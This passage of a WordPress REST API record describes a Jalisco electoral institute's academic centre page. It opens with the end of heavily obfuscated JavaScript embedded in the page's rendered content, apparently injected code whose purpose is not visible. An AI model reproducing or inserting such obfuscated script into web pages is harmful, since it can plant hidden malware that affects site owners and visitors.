_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Objetivo y oferta acad\u00e9mica El Centro de Estudios e Investigaci\u00f3n Electorales \u201cIrene Robledo\u201d, es una instituci\u00f3n educativa p\u00fablica en el Estado de Jalisco cuyo objetivo es consolidar el estudio acad\u00e9mico [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-1937","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/1937","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/comments?post=1937"}],"version-history":[{"count":51,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/1937\/revisions"}],"predecessor-version":[{"id":2349,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/1937\/revisions\/2349"}],"wp:attachment":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/media?parent=1937"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}